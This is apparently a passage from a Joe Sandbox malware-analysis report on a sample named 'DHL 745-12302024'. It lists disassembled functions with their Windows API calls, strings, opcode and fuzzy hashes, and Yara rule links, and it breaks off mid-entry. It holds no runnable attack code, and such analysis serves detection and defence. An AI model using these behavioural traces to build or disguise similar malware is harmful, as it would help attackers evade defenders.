Opcode ID: 4d3206935512ea0df6ea33bf929c2a7b4b12015f45e326ef3fa15e1be5238136
Instruction ID: d10786f31a6e479884e8428fd3c3a58c5b8d22e1f6bd798a5dcbebea8436bfe5
Opcode Fuzzy Hash: 4d3206935512ea0df6ea33bf929c2a7b4b12015f45e326ef3fa15e1be5238136
Instruction Fuzzy Hash: 2641F231600258AFDB10DF96C984BAABBF9EF45364F14815DF9069B291D770AD82CBE0

Function 00ACCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ACCF22,?), ref: 00ACDDFD

Part of subcall function 00ACDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ACCF22,?), ref: 00ACDE16

lstrcmpiW.KERNEL32(?,?), ref: 00ACCF45
MoveFileW.KERNEL32(?,?), ref: 00ACCF7F
_wcslen.LIBCMT ref: 00ACD005
_wcslen.LIBCMT ref: 00ACD01B
SHFileOperationW.SHELL32(?), ref: 00ACD061

Strings

\*.*, xrefs: 00ACCFF3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: ff2f7134d9982c0b695ba8007e2d179dca84f66a3f27ea0c1bcdeb340776cb6e
Instruction ID: ec21312582e6c287fd9937727672fc4b5e49d83270f8c00bb7da42866e5c2e7a
Opcode Fuzzy Hash: ff2f7134d9982c0b695ba8007e2d179dca84f66a3f27ea0c1bcdeb340776cb6e
Instruction Fuzzy Hash: A24156719052185FDF12EBA4CA81FDEB7B8AF08790F0100EEE509EB141EB34AB45CB50

Function 00AC7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC778F
SysAllocString.OLEAUT32(00000000), ref: 00AC7792
SysAllocString.OLEAUT32(?), ref: 00AC77B0
SysFreeString.OLEAUT32(?), ref: 00AC77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 00AC77DE
SysAllocString.OLEAUT32(?), ref: 00AC77EC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bbf4a0089e5aeef671093abdb22d5cf9ad35451251577809b76fe16e4171e7c6
Instruction ID: 4dfa55c7ad9ba838f76e8a87eff929abedc849e41ec0b460ce86d5e2a6bcf357
Opcode Fuzzy Hash: bbf4a0089e5aeef671093abdb22d5cf9ad35451251577809b76fe16e4171e7c6
Instruction Fuzzy Hash: 1E21AE7660821DAFDB10DFE9CD88EBF73ACEB09364B018029BA15DB190D670DD46CB64

Function 00AC77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC7868
SysAllocString.OLEAUT32(00000000), ref: 00AC786B
SysAllocString.OLEAUT32 ref: 00AC788C
SysFreeString.OLEAUT32 ref: 00AC7895
StringFromGUID2.OLE32(?,?,00000028), ref: 00AC78AF
SysAllocString.OLEAUT32(?), ref: 00AC78BD

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9ed08cd54ddac82b03092ad53048f7293e196628526eb9684afd963eedba1e09
Instruction ID: 8e29dc7ced4fa5806e08b6d4cb83ca25b485f0a6d2dd431ddd5baf738cb08f83
Opcode Fuzzy Hash: 9ed08cd54ddac82b03092ad53048f7293e196628526eb9684afd963eedba1e09
Instruction Fuzzy Hash: E4213136608108AFDB109BE9DC8DEBA77ACEB097607118129BA15CB2A1D674DD81CB64

Function 00AF5706 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AF5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 00AF579D
_wcslen.LIBCMT ref: 00AF57AF
_wcslen.LIBCMT ref: 00AF57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF5816

Strings

@U=u, xrefs: 00AF5745, 00AF579D, 00AF5816

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID: @U=u
API String ID: 763830540-2594219639
Opcode ID: 671f9c20c82060c4f9b87d3c2d2ff00541a205133bd6daa411a623d402c01617
Instruction ID: 7a711314278cf3aec4b4f50bba8194bfd28cd5bd89595e5a4d04b85a8d54b04f
Opcode Fuzzy Hash: 671f9c20c82060c4f9b87d3c2d2ff00541a205133bd6daa411a623d402c01617
Instruction Fuzzy Hash: 0C214A71D0461C9ADB209FE4CC85AFEBBB8EB04725F108616FB29EA180D7748985CF50

Function 00AD04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00AD04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AD052E

Strings

nul, xrefs: 00AD0567

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 47e6fd38338d672b8706e37cf4ddf04856018bc25a35679074f1dd20a32144ae
Instruction ID: 5ed9420905cddf04f6cd0c1fde3351cb9b1778beb917c8e4094cbbe2011198eb
Opcode Fuzzy Hash: 47e6fd38338d672b8706e37cf4ddf04856018bc25a35679074f1dd20a32144ae
Instruction Fuzzy Hash: 5C215175500305DBDB209F69E845F9A7BB4AF54724F208A1AECA2D72E0D7709951DF20

Function 00AD05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AD05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AD0601

Strings

nul, xrefs: 00AD0639

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 98b8b433b35bd0be1b6fa31600619fc16f75b14aa42769a2838465c974c85390
Instruction ID: f8f91dec83f58b7941f6a1ee30263c0f577519b66da67f7de7def33c9f513c89
Opcode Fuzzy Hash: 98b8b433b35bd0be1b6fa31600619fc16f75b14aa42769a2838465c974c85390
Instruction Fuzzy Hash: CE2141755003059BDB209FB99C04FAA77E4AF95730F204A1AE8A2E73E0D7B0D961CB10

Function 00AF40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A6604C
Part of subcall function 00A6600E: GetStockObject.GDI32(00000011), ref: 00A66060
Part of subcall function 00A6600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A6606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AF4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AF411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AF412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AF4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AF4145

Strings

Msctls_Progress32, xrefs: 00AF40E3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 9acfa58fe6d6f2e50d4e86aa6004b674f703eaebec71eb6c0097f58c1a6ac5e2
Instruction ID: cb08e0ee55a5a57a4b16080a035c90dbb406ccb6681722460d36a75b3a079be4
Opcode Fuzzy Hash: 9acfa58fe6d6f2e50d4e86aa6004b674f703eaebec71eb6c0097f58c1a6ac5e2
Instruction Fuzzy Hash: C91181B114011DBEEB119FA4CC85EE77F6DEF08798F014210BB18A2050CB769C21DBA4

Function 00A9D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A9D7A3: _free.LIBCMT ref: 00A9D7CC

_free.LIBCMT ref: 00A9D82D

Part of subcall function 00A929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000), ref: 00A929DE
Part of subcall function 00A929C8: GetLastError.KERNEL32(00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000,00000000), ref: 00A929F0

_free.LIBCMT ref: 00A9D838
_free.LIBCMT ref: 00A9D843
_free.LIBCMT ref: 00A9D897
_free.LIBCMT ref: 00A9D8A2
_free.LIBCMT ref: 00A9D8AD
_free.LIBCMT ref: 00A9D8B8

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: fe4601f8410f3cdb21a18289550167bf4bea5452f9918721f7e9aca1bd6509cc
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: D9111971A40B04BADE21FFF0CE47FCB7BDCAF44700F404825B29DAA492DA65B58587A0

Function 00ACDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ACDA74
LoadStringW.USER32(00000000), ref: 00ACDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ACDA91
LoadStringW.USER32(00000000), ref: 00ACDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ACDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00ACDAB9

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: f31fdf9ce42e562646bcc1f05c5b0777b1fe9ea9a9287271730a25b9e5f9c55d
Instruction ID: 211a004823ac1260cd8994d3b5aa45f5db3cc9e49b10a9c88091a7aa7d10ac76
Opcode Fuzzy Hash: f31fdf9ce42e562646bcc1f05c5b0777b1fe9ea9a9287271730a25b9e5f9c55d
Instruction Fuzzy Hash: CA014FF250020C7BE750EBE19E89EF7726CE708711F4005A5B75AE6041E6749E858B74

Function 00AD096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(012CE288,012CE288), ref: 00AD097B
EnterCriticalSection.KERNEL32(012CE268,00000000), ref: 00AD098D
TerminateThread.KERNEL32(012CE280,000001F6), ref: 00AD099B
WaitForSingleObject.KERNEL32(012CE280,000003E8), ref: 00AD09A9
CloseHandle.KERNEL32(012CE280), ref: 00AD09B8
InterlockedExchange.KERNEL32(012CE288,000001F6), ref: 00AD09C8
LeaveCriticalSection.KERNEL32(012CE268), ref: 00AD09CF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 6b8e5334814a25fe7676ee3bbfee189d921d440d8abada9d4e3896784ab0f927
Instruction ID: eb79743ca82f5ca3e06a4f27097ad205f6fd3b3d6a74baecd673d17e780837fe
Opcode Fuzzy Hash: 6b8e5334814a25fe7676ee3bbfee189d921d440d8abada9d4e3896784ab0f927
Instruction Fuzzy Hash: ADF01D31442516ABD741ABD5EF88BE6BA25FF01752F401116F202908A0C7749466DF90

Function 00AE1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 00AE1DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AE1DE1
WSAGetLastError.WSOCK32 ref: 00AE1DF2
htons.WSOCK32(?), ref: 00AE1EDB
inet_ntoa.WSOCK32(?), ref: 00AE1E8C

Part of subcall function 00AC39E8: _strlen.LIBCMT ref: 00AC39F2

Part of subcall function 00AE3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00ADEC0C), ref: 00AE3240

_strlen.LIBCMT ref: 00AE1F35

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: f1911b7747b692f21a10fa2555a211b50713f23302dafe4b5057cfb14fe98f9d
Instruction ID: 0908039efbb48fabc014d830b8a91837047287daa845ab0b2f95f220d9129006
Opcode Fuzzy Hash: f1911b7747b692f21a10fa2555a211b50713f23302dafe4b5057cfb14fe98f9d
Instruction Fuzzy Hash: 12B1EF31204390AFC324DF65C995E6A7BF5AF84318F54894CF45A9B2E2DB31ED82CB91

Function 00A901B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00A900BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A900D6
__allrem.LIBCMT ref: 00A900ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9010B
__allrem.LIBCMT ref: 00A90122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A90140

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 7667c941e70cd3931d3bf8a719b00badaeef74e52737a1af453351a89ebb5eef
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 0681D276B00706AFEB24AF68CD41B6B73E9AF41764F24463AF651D7681E770DD008B90

Function 00A961FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A882D9,00A882D9,?,?,?,00A9644F,00000001,00000001,8BE85006), ref: 00A96258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A9644F,00000001,00000001,8BE85006,?,?,?), ref: 00A962DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A963D8
__freea.LIBCMT ref: 00A963E5

Part of subcall function 00A93820: RtlAllocateHeap.NTDLL(00000000,?,00B31444,?,00A7FDF5,?,?,00A6A976,00000010,00B31440,00A613FC,?,00A613C6,?,00A61129), ref: 00A93852

__freea.LIBCMT ref: 00A963EE
__freea.LIBCMT ref: 00A96413

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 88976c192539c9451789c1807b5215cf3b2970a39a89d69e1e08293a909a02aa
Instruction ID: 315b9abaed4db5bf1991206097b3ffa74e8e1436b9039cd2e91081bebb996ae0
Opcode Fuzzy Hash: 88976c192539c9451789c1807b5215cf3b2970a39a89d69e1e08293a909a02aa
Instruction Fuzzy Hash: 0B519F72B00216ABEF268FA4DD81EAF7BE9EF44750F154629FC05DA190EB34DC50D6A0

Function 00AEBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

Part of subcall function 00AEC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEB6AE,?,?), ref: 00AEC9B5
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AEC9F1
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AECA68
Part of subcall function 00AEC998: _wcslen.LIBCMT ref: 00AECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEBCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEBD25
RegCloseKey.ADVAPI32(00000000), ref: 00AEBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AEBD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AEBDF3
RegCloseKey.ADVAPI32(?), ref: 00AEBDFF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: eb996aec9ecb52c65400c475957b29ed12c1fe0975ccd01c9998f5039b0df115
Instruction ID: da9c2e5b7612aeda68481c7cf0451881d911aa788ef12f8e81d1162566cdefa0
Opcode Fuzzy Hash: eb996aec9ecb52c65400c475957b29ed12c1fe0975ccd01c9998f5039b0df115
Instruction Fuzzy Hash: CE818B30118281AFD714DF65C995E2BBBF5BF84308F14895CF45A8B2A2DB31ED45CBA2

Function 00ABF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00ABF7B9
SysAllocString.OLEAUT32(00000001), ref: 00ABF860
VariantCopy.OLEAUT32(00ABFA64,00000000), ref: 00ABF889
VariantClear.OLEAUT32(00ABFA64), ref: 00ABF8AD
VariantCopy.OLEAUT32(00ABFA64,00000000), ref: 00ABF8B1
VariantClear.OLEAUT32(?), ref: 00ABF8BB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 8b1e13c8f4edf7866524d47731fefc38a162c05cc08fb86770fbfaa7d25cd210
Instruction ID: 8a4fe08dfcd49a8fb80818a1bc8b8d8df7e970444c987bccc24a569c8696f5ab
Opcode Fuzzy Hash: 8b1e13c8f4edf7866524d47731fefc38a162c05cc08fb86770fbfaa7d25cd210
Instruction Fuzzy Hash: 5451A131610310BECF24ABA5DD95BA9B3BCAF45710B289467E906DF297DB708C40C796

Function 00AD910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00A67620: _wcslen.LIBCMT ref: 00A67625

